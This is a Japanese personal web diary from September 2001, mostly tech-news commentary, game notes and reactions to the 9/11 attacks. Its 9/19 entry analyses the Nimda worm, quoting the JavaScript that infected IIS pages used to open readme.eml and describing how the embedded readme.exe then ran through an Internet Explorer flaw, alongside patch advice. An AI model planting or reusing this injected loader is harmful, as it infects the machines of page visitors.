ひとりごと - Sep. 2001


9/28 PSO:ファミ通カップ[2]

ファミ通 -MUXIMUM ATTACK-

←←

→→
1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23/30 24 25 26 27 28 29

[ Diary ] [ Go Top ]

PSOのページ をちょろちょろと。
DrillerG公式ランキング / MP3-CDPlayer情報(停止)


9/30

MPEGエンコーダ「TMPGEnc」のPentium 4最適化版が公開 v2.00

PSOv2:オンラインクエスト(小さくなって冒険するもの)でもらえるもの:グラインダとマテリアル。…-_-#


9/29

SHIFT UP

なーんか、とある方面から突っ込みが入りそうだが :-)

インターネットマガジンが「SHIFT UP」の掛け声とともに方向性を大幅に路線変更。今までのインターネット関連情報・記事(HTML講座とか)がなくなり、ある意味インタビューや戦略イメージの話など、なんだか方向性がないWIREDのようなものになった、と思う。以前からずっと続いていたインターネット接続マップもないし、付録CD-ROMもツール的ソフトウェアが全くなくなった。もちろん、プロバイダリストもなし(Webでは残っているようですが)。
…これってSHIFT UPしたとはいえ、「インターネットマガジン」と呼べるのだろうか。確かにインターネットをメインにした雑誌というものは、これからは難しくなっていくような気はするが、今までの読者を完璧に切り離したような雑誌にするというのも、ね。

立ち読みすることはあるかもしれないが、このような内容では買うことは皆無になるだろう。惜しい雑誌をなくしたものである。

おまけ:…友人と話していた内容をまとめると、「つーか、いつ休刊するんだろう」。

よた話

友人と話をする。仕事の話になる。…ああああ、暗い話しかでてこない ;_;


9/28

秋葉原ラジオ会館に「パーソナルコンピュータ発祥の地」のプレートを設置
ソニー銀行でトラブル,14時間サービス停止
IO-DATA:24倍速内蔵CD-RWドライブ「CDRW-AB24B」を49%値下げ(15,000円)

OS評価でLinuxがランクアップMicrosoftの「Windows」は分析対象に含まれていない


9/27

AirH"対応のCFカード型PHS「AirH" Card petit」、10月4日発売
悪い評判は聞かないけど、良い評判も聞かないなあ。まだ待ちかな。

オープンソースのPDA向けGUI環境『式神』正式版リリース
IEの新検索機能で思わぬトラブルを被った企業
MSN Searchに誘導するという機能を外すことはできないんだろうか。あ、外すことはできたとしても、「ふつう」のユーザーはチェックボックスを探して機能を解除することはしない、か。

PSO: HP 1000over


9/26

謎:更新しました。

Frontpage製ウェブでのマイクロソフト批判は禁止
Frontpage2002の使用許諾書に書いてあるそうで。本当なのかなあ?ま、、HomePageBuilderを使っているわしは、じゃんじゃん批判して良いわけですな。
WebTV,来年3月で終了 ただの箱ができあがるわけですね。それにしても、「ドリームキャスト用接続ソフト」ってあったのな。

ゲイツ君:サイバーの世界、実の世界
朝日新聞が「萌え」と「厨房」を解説
Linuxカーネル2.4.10リリース
松下、40GB HDDを搭載したDVD-RAM/Rレコーダ 従来機種+HDD


PSO :最近、何も出ないんですけど。


9/25

WPE

略しすぎて何がなんだか分からん。

WORLD PC EXPO 2001レポートリンク集
WORLD PC EXPO 2001特集ページ
WORLD PC EXPO 2001レポート――幕張で見つけたホットなモノ&ヒト

OLYMPUSのブースもすごかった。大きな水槽があるので、まさかとは思ったけど、…やっぱり泳いでました。はい。
しかし…WWWでチェックしてから見に行くか、WWWでチェックするだけのどちらかにしておかないと、「行ってきてからWWWでチェックして、見損ねたものが沢山あった」とかいう情けないことが…あったんだってば ;_;
#AMショーもな ;_;

「Mac OS X v10.1」が正式リリース
RealOne RealOne = RealPlayer + RealJukebox (+ 月額使用料?)
海底ケーブルが破損 「おそらく船舶の錨がぶつかったのだろう」…うーむ。
プレビュー 話題のDVDレコーダ 「ソニー RDR-A1」 vs 「松下 DMR-E20」
Pentium 4用のDDR SDRAM対応チップセットP4X266を搭載したマザーが登場 遂にでましたか。大丈夫かな。

602Pro PC Suite Ver.2001 MS-Office書類互換のオフィススイート
Sygate Personal Firewall Ver.4.2.867 フリーの高機能パーソナルファイアウォール。ビジネス利用時には39.95ドルのライセンス料が必要。
グループウェアのリスト


PE_NIMDA.A対策Web
緊急特集:史上最悪のウイルスが出現:W32/Nimda ワームの動作と、対処方法も一応かいてあります。

JustArks Javaで動く、プレゼンテーション・表計算・ワープロ(一太郎Ark)。 download page


9/24

DVD-Video作成にかかる時間

昔のビデオが出てきた。「The Super Fuson」といって、1989年8月8日に白鳥センチュリーホール@デザイン博まっただなか(!)で行われた、CASIOPEA、T-SQUARE、OTTOTTRIOの合同ライブビデオで、TV放映されたもの。
で、早速MPEG2(Win2kと相性の悪いIO製を利用 ;_; )にして、DVD-Videoに。…むちゃくちゃ時間がかかるんですが。実際に書き込む時間(1倍速=約1時間半)なのは仕方がないとして、前準備に2時間くらいかかる。DVD-Video形式に合う形にしているとはいえ、何とかならないものかなあ。CPUを速いものにしないとだめかなあ。
※現在は500MHz
とりあえず出来上がったものをPS2で鑑賞 :-) 高画質でMPEG2化したわけじゃないけど、十分だな。
ただ、DVD-Videoにするより、MPEG2フォーマットでそのまま保存したほうが良かったりして。
オーサリングツールに、タイムサーチとかできる機能があれば(見つかれば?)DVD-Videoにするのもいいんだけど。それでもその作成に時間がかかってはなあ。

「ウイルスに狙われるのはIIS浸透の代償」とマイクロソフト阿多社長

…開いた口がふさがりません。ウイルスが発生してから対応(しかも間違っている)するのでは遅すぎる、ということがまったく分かっていない。
しかし…この文章、突込みどころ満載だなあ。

経済産業省、初の「天才プログラマー」12人認定 「天才プログラマー」という言葉があまりにも…


9/23

第2号

…ホームラン。また50球追加ですよ。


9/20

猛威を振るうNimda,PC EXPOにも波及
会場のPCにも引っかかったものがあるらしい。うーむ。

「Nimda」自動駆除ツールを無償公開 トレンドマイクロ

WinCDR7.0 Ultimate DVD


9/19

Nimdaの話

新しいワーム(Nimda)が出回っているみたいです。…つーか、社内でもあやしいログが見つかるわ、外のいろんなサイトが改竄済みだわ、どーにかならんものか。

Nimda Worm セキュリティホールmemo
W32.Nimda.A@mm

IEとIISの脆弱性を利用しているようで。そのファイル(readme.eml)をみたんだけど、中にreadme.exeがあったりする。(で、そのMIME-TYPEが content-type:audio/x-wav ってどゆこと?)

感染したIISのページに埋め込まれているものはこんな感じ。

<HTML><script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script></HTML>

とりあえず、JavascriptをOFFにすれば、一時凌ぎにはなる(訂正:ならない)けど、ほっとかないほうが。
なんといっても、ページを読み込むと、、

→Javascriptでreadme.emlを読み込む→拡張子のおかげでOutlookが立ち上がる→emlの内容がHTMLメールで、IEの穴をついてその中にある本体(readme.exe)が勝手に起動→悪さが始まる

というところまで自動的にやる場合があるらしいので怖いところではある。

対策:
・Internet Explorer 5.01 SP2
・Internet Explorer 5.5 SP2
にしないとだめ。IISはパッチを当てる。4.x、5.0はどうなるのかは不明。

感染したところ。MSNとか。

MSN ウェブサイトご覧の皆様ならびに Internet Explorer ご使用の皆様
新種のワームによるサーバーの被害とご利用者への影響について

被害に遭われた人にたいして、謝るだけのようです。なに考えてんだか。

MSN,共同通信も──Nimdaが国内でも感染拡大

で、セキュリティホールの原因の元のひとつ。IEだけですが。
不適切な MIME ヘッダーが原因で Internet Explorer が電子メールの添付ファイルを実行する (MS01-020)


readme.emlの中身:[セキュリティホールmemoMLより]
http://fuga.jp/~densuke/diary/?date=20010919#p09 (取り扱い注意)

IISへの攻撃パターン…なのかな?:[セキュリティホールmemoMLより]
http://memo.st.ryukoku.ac.jp/archive/200109.month/1197.html
http://memo.st.ryukoku.ac.jp/archive/200109.month/1223.html
まとめがあるところ
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/nimda-sakai.txt

こんなところで。


富士通,新型「LOOX」を参考出品 世界最軽量,AirH”IN搭載 仕様詳細は10月以降に正式発表するとのこと。
ドリキャス用タイピングギャルゲー ハドソン登場する女の子は同社のNINTENDO64用ゲーム「ゲッターラブ!!」で人気が高かった3人」。なんだかなあ。


PGPの情報
PGP User's Manual for Windows
PGP,PGP/MIMEへのWindows版MUAのサポート状況


若い女性のセックスを5年間禁止 スワジランド エイズ対策とはいえ…。罰金は「牛1頭分」とか。
都心のホテルに爆弾予告電話=米系金融機関が入ったビルにも 便乗するおばかさんもいるようです。
追悼セレモニーは散々 茂木のサーキットにて。さすが日本。悪い意味で。


マイクロソフト、Windows XP日本語版の価格を発表 今日はこの記事なんか霞んで見えますな。価格はリンクからどーぞ。


9/18

高木産業、ノートPCをベースにしたWindows CE機 Celeron700MHzのWindowsCE機。
Windows CE for x86を動かす、WindowsCEマシンはメインパソコンになり得るか?

「MSX電遊ランド」が22日に開幕 公式エミュレータのデモも

ヤマハ、MP3デコーダ搭載USB 2.0対応CD-R/RWドライブ / SONYのよりも良さそう…?
カノープス、「MTV1000」のアップデートプログラム [ Ver.1.02 ]

The Playa and DivX Codec Bundle Ver.4.01
IEとNetscapeをタブ切り替え型Webブラウザーにする「collector」v1.0


セガ隔離部屋訴訟で和解が成立 東京地裁
今後、転籍の実施では事前に本人の同意を得る方針だという。


9/17

両足切断のザナルディがこん睡状態

ソニー、Windows 2000ベースのHDD内蔵AV家電
MDLPデッキ、TVチューナ、DVD内蔵、MPEG-2録画も可能
起動するまでどれくらいかかるんだろうか…?まさか電源OFF=スタンバイじゃないだろうな…

DDIポケットユーザーには福音のデータセット割引……でもちょっと待って

@nifty「MIDIフォーラム」で無料楽曲利用が可能に JASRACが正式許諾

nero5.5 DVD-Rなどに対応するとか。
F1 Photo Link
安全なネットワークプログラミング


9/16

A.ザナルディ、CARTで大クラッシュ両足切断」 !?
ザナルディ、両足切断で選手生命絶望 …。

カーブ

金山のバッティングセンターにはカーブの球が打てるところがあるんだった。…前言撤回、また行ってみる。…70km/hですよ。しかも内角から曲がってくるんですよ。なるほど、これで内角球の恐怖感を煽って外角攻めですか、、、というか、内角から曲がってくるので、それなりに打ちやすい球なのかもしれない。真中から曲がったらボール球になるしなあ。タイミングさえあればそれなりに打てます。はい。80〜90km/hの方が打ちやすいかもしれないですが。
ただし、ここには「実戦モード」なるボタンがあって、70km/hのカーブと100km/hの直球のどちらが来るか分からないモードがあったりして。30km/hの違いはそれはもうタイミングの狂うこと。直球待ちじゃないと対応できないですね。
…しまった毎週通っちゃうかも、でも1回300円だしなあ。
地元はしばらく120km/hで体力作り(って何か違うような気が)。

lv46 21:00 VH遺跡
lv111 2??:00 ULT遺跡


9/15

IEEE-1394接続のCCDカメラが登場、VGAで30fpsの撮影が可能


マクラーレン、D.クルサードとK.ライッコネンの来季ラインアップを発表 ハッキネンは1年休養とのこと。
虎之介、6位フィニッシュで日本人最高位タイの快挙 あとは表彰台と…


9/14

WindowsXPのファイアウォール機能を検証する
外務省職員の皆さん、昼休み時間守ってネ副大臣が通知 2時まで昼休みですか。
Caldera,Linux/UNIX統合戦略に貢献のプログラマーをレイオフ
DDIポケット、月額基本料無料の「H"IN使っただけコース」
マイカル:大手スーパー初の経営破たん 負債総額1兆円


9/13

shockwaveによる説明 (CNN)
http://www.cnn.com/SPECIALS/2001/trade.center/index.html

米政府、容疑者約50人を特定
米政府はテロ実行犯を特定 FBI長官
現地レポート:N+Iに陰を落とした米国同時多発テロ
さらに高級ホテルなど2棟が崩壊
NASAの画像:、地球観測衛星、軌道上の国際宇宙ステーションから / その2

15型TFT液晶が3万9800円 アドテックが台数限定で 台数限定とはいえ…
松下、IEEE 1394外付け型のDVD-RAM/Rドライブ ATAPI内蔵型(LF-D321JD)についても、価格改定が行なわれる見込み。
米Be,NASDAQから上場廃止通告
ソニックブルー、FMラジオとMP3/WMAに対応したCDプレーヤー がーん。

ブックススケジューラ Ver.2.1.1
File Upload CGIで知らないと困ること
TurboLinux7 Update情報


9/12

CNN.co.jp
時系列で分かるところ:http://simon.xcom.gr.jp/US-terrorism.txt

Video: First WTC attack (real video)
Video: Second WTC attack (real video)


アラブ人5人をテロ事件容疑者と特定か 米紙
米同時テロ:火災が鉄骨溶かす? 超高層ビル崩壊
航空機激突で,ニュースサイトもパニックに
大規模テロ,通信ネットワークにも打撃
電話が通じない! インターネットが重要な連絡手段に
米大規模テロ事件で,Akamaiの共同創設者が死亡
米国同時テロ:戦場と化したニューヨーク

イラクは同時多発テロを賞賛 「罪の報い受けた」 …賞賛?


「Code Blue」,中国とオーストラリアで感染拡大 詳細がどうなっているのか、よく分からないんですけど。この辺かな?
「知りすぎた男」が実名で告発する警視庁の裏ガネ


セガ,「PSO」PC版を年末発売
DDIポケット、月額基本使用料が半額になる「データセット割引」


9/11

Day of Terror CNNの表題

Terror attacks hit U.S.
対米大規模テロ:世界貿易センタービルに航空機突っ込み炎上

…21世紀版「パールハーバー」になるのかもしれない。


VIA、特許侵害などでIntelを反訴
あらあら。訴訟合戦になったか。「P4X266」の出回る時期っていつになるんだろうねえ。

マイクロソフトのブラウザー・アップデートに怒りの声
http://www.asahi.com/english/svn/K2001082700427.html
これからはNetscape互換のプラグインをサポートしないということ。QuickTimeプラグインが動作しないというのはそういうことだったのか。見落としてたよ。

Yahoo! BB、1年縛りは導入しない、事務手続きのミスで会員規約に盛り込まれる
Yahoo!BBが会員規約の変更を誤って掲載 - 同日中に削除予定?
この規約に嫌気をさして解約した人もいるようですけど、それについてはどう対応するんだろうね。

デスクトップ向けPIII,12月7日で受注終了
ノートPC用のCPUをデスクトップにも挿せるような品がまたでるんだろうな。ちなみに、某所では下駄を履かせたMMX Pentium300MHzのアクセラレータがまだ売っていたりします。2万円以上しますけど。
USB接続の小型2足歩行ロボット 富士通グループ
DivX,映画業界の技術サプライヤーを目指す
エプソンダイレクト,i845搭載P4マシンを発売 ミニタワー。1.5GHzモデルで、99000円から。
CPU、HDD相場情報 60GBが15000円で買えるようになったのか…
サムスン,薄型B5ノートに新モデル GatewayノートPCの部品取り用…あれ、逆だっけ?
新型「CLIE」はPalm OS 4.1採用,MP3再生にも対応 9月22日より発売。5万円弱。
Pocket PC 2002が市場を独占できない理由
セガ,「PSO」PC版を年末発売

分割ダウンロード可能なダウンロード支援ソフト「Irvine」v0.1.0 beta
Hot Soup Processor Windows9x/NT/2000用のインタプリタ言語

BLR−TX4 ファームウェア1.20β1

果てしなく誤った記事とは:まあ、これの9/1の日記を参照のこと。

赤ハン:A40


9/10

PSO近況

RAcast:Lv34、HP239。
HPが足りないにもかかわらず、HARD遺跡-DFへ。剣(250damage)では即死だけど、グランツをくらってPBゲージをためれば(PB無敵)いいでしょ、と思ったら甘かった。…グランツでも即死じゃないかい。(※光耐性35) ちなみに即死だとPBゲージが溜まりません。ぬう。
人形はたくさん持ってきたから、残り個数との戦いかなー、とか思いながら…。

ひらめいた。

青玉くらってPBゲージためよ。
次の瞬間、瀕死状態による無敵が発動 :-) あとは楽勝。赤ハンドガンの威力ってすごいねえ。
ちなみに、HARDのボス(DF以外)はあっという間でした :-)
※VH森:lv36にてクリア

Turbo Linux7のインストール

インストール時にPCカード接続のPanasonic・KXL-808N(CD-ROM)が認識されるのはちょっと感動。
(超漢字ではかなり前から認識できてたけど)
インストール作業の大半はCD-ROMからのコピー作業。CD-ROMが(実質)8倍速からかもしれないけど、1時間以上時間がかかるようになったんだなー。
困ったことがひとつ。ディスプレイアダプタの自動設定に問題があるのか、GUIでのインストーラが正常に表示されず、真っ暗になってしまうこと。これはtextモードでインストーラを起動して、X:ディスプレイ設定の周波数の設定を何とかする(これの不具合らしい)ことで解決した。
で、KDE2.1を動かしてみる…重い。Celeron366ではもうだめなのかなー。

Intel、Pentium 4用チップセットの特許侵害でVIAを提訴

日本IBM、次期モデルからAptivaブランドを廃止
「Aptiva」の文字が無くなるだけで、店頭販売はやめないらしい。

アイ・オー、12,000円の内蔵型16/10/32倍速対応CD-RW

デジカメの動画をインターネットで公開しよう〜Real形式に変換
タイピング・オブ・ザ・デートの壁紙…?


9/9

葬らん

バッティングセンターにて。2ゲーム分追加できるみたいです…すでに1000円分(6ゲーム=150球)買ったのになあ。
とりあえず分かったこと:150球以上は、体力が持ちません。

気象サービス


9/7

妙に多いな。

製品発売前に出回る『XP』の海賊版

レックスマーク インターナショナル Optra E 312L
PostScript対応で5万円を切っているというのも、昔では考えられなかったことなんだが。(ただし、日本語フォントは自前で持っていない模様)

RICOH:+RWの衝撃

使い勝手が向上――「Pocket PC 2002」を試す
Pocket PC 2002正式発表。搭載機は「400〜600ドル」
デバイス要件が厳しくなっているようで、安いPDAは出ないような雰囲気。下手をすると、もしも組込み型WinXPを使ったPDAを作ったのなら、そっちのほうが良かったりして。
しかし、相変わらず(すぐに)買いたいものが出てこないなあ。シグマリオンIIがFeelH"対応だったら買ってもいいんだけどさ(←defaultでは対応しない)。54800円で売ってるようですけど。
sigmarionII発売、新宿の実売価格は54,800円

「液晶のシャープ」を再認識させたシャープ
「AQUOS」(液晶TV)ってそこそこ売れてるんだなあ。

休暇中のレイオフが急増――IT労働者の悲しすぎる夏

米SONICblue、ブロードバンド対応のパーソナルビデオレコーダーを発表

訴訟を懸念,新たに2人のセキュリティ専門家が「沈黙」
DMCAのおかげで、必要な情報が出なくなるという状況になりつつあるのはまずいと思うのだが。

NVIDIA,Linux用の新ドライバをリリース
これ、「米速報」の割には、元記事URLのドメインがが*.ukなんだけど。うーむ。

Outlook 2002におけるメッセージ・エンコーディングの問題点
うわ、Outlook2002だとレジストリによる設定が必要なんですか。ひどい。日本の事情を何も考えてない仕様だな。

「反乱」起こす技術者,中村修二氏の提訴がダメ押し

オープンソース・データベースのグレート・ブリッジが後悔
RedHatもこれも、PostgrSQLが元になってるしねえ。
Windows XP日本語版開発完了、製造工程へ向け出荷開始


とほほのWWW入門
HTML4.0について

turbolinux7 [モニタの設定時に水平同期周波数の値と垂直同期周波数の値が逆に設定される]うわあ…


9/6

フリーソフトBSGとFreeBSD

「BSGない?」と聞かれた…わかるかんなもん。
くどいけど、コンピュータ会社なんですけど。わしのとこ。

大須:メガタウン内のエイデン(B1F)が閉店セールを実施中。9/30まで。

米SONICblue、ブロードバンド対応のパーソナルビデオレコーダーを発表
シャープ、狭額縁設計の15インチ液晶ディスプレイ
店頭予想価格は55,000円。シャープでもこの価格帯に落ちてきたんだなあ。

窃盗車で店に突入、ゲームソフト奪う 愛知県ゲームソフト販売店…に軽乗用車ごと突入」。
あきれたページ - spamページ ビジネスアシスト社
SVGとSMIL AnimationがW3C勧告に


HTMLをテキストへ手軽に変換したいときの道具「HtoX32」
PCエミュレーター「VMware Workstation」v3.0 Betaがリリース
カノープス、WinDVDシリーズをアップデート

Vix: ひとこと


9/5

Opera専用proxy(SJIS+日本語ワードラップ) -- PrOpera(プロペラ)

Yahoo! BB、回線環境の悪いユーザーは「ReachDSL」で救済
ReachDSLは、いわゆる独自規格。パソコン批評2001年10月号(発売中)に書いてあったな。
確か、最低速度が決まってい(256kbs)DSL形式たような。

HP-Compaq合併を提言した男――では次に起こるのは?


9/4

HP,Compaq買収で合意

Yahoo!BB,正式契約は約50万件に でも、実際に接続可能になっている数は約1割。

Windows XPのRTMコードをレビュー
Review:Windows 9xに引導を渡すXP
本当に「Windows2000と同じくらいのハードウェアリソースしか要求しない」、
Pentium II/400MHzプロセッサと128MバイトのRAM相当)でWindows XPも満足のいくように運用できる」のかは怪しいんだけどなあ。

不正アクセス急増でロシアからの接続停止へ ニフティ
盗用されたユーザID対策のためらしいです。これでロシアからNIFTYにログインできなくなったわけですが…あんまり影響はないのかもしれない。

違いの分かる…

魂に訴えるPCは「裏マーケット」でゲットだ と、
Where to find portable PCs with some real pizzazz(finally!)

http://www.paltalk.com/ chat:なんてものもあります。


9/3

gateway - その後

サポートページは今までと変わらない…のかな。ドライバもあるみたいだし。

Intel、Celeron 1.1/1GHz、950MHzを正式発表
1.1GHzが103ドル、1GHzが89ドル、950MHzが74ドル」。CeleronとPentiumIIIの違い:キャッシュのみ…だよな。ただ、CPUが「熱」そう。

ブロードバンドの大嘘」という話。


http://www.big.or.jp/~jupiter6/
http://www.asahi-net.or.jp/~et3n-hsk/ivisit/index.html


9/2

GB版Driller:とことんで10000m達成。

lv106@遺跡

なんとか、森でDark属性の赤ハンドガンを入手(最近、数回もぐっても何も出なかったしな)。…で。
シフタ&デバンド&ザルア&ジェルンでもDark+20の赤ハンドガンでノーマルダメージが100を超える程度(=弱弱強で5〜7セット)。グランソーサラーのグランツには耐えられるからまだましだけど、時間がかかるなー。まるでlv80:Ult森のようだ。
ただ、赤セイバーでもmissを連発するのは何とかして欲しいもんだが。

必要なもの:Hit修正&Dark+30以上の赤ハンドガン

130km/h

えー、そろそろ

動体視力 + 体の反応速度 + スイング速度 < 球の速度

になりつつあるようで、タイミングを間違うと修正が効かなくなりつつある。タイミングがぴったり合えばどうとでもなるんだが。
これ以上のスピードについていくには、基礎的な筋力を強化しないだめかもしれないなあ。地元のバッティングセンターでは設定できないけど、140km/hではちょいと無理かも。

玄人志向からGigabit Ethernetカードが8,000円割れで登場 残りはHubの値段だけ。


9/1

やっとUlt遺跡に突入…シフタ&デバンドでもダメージ0?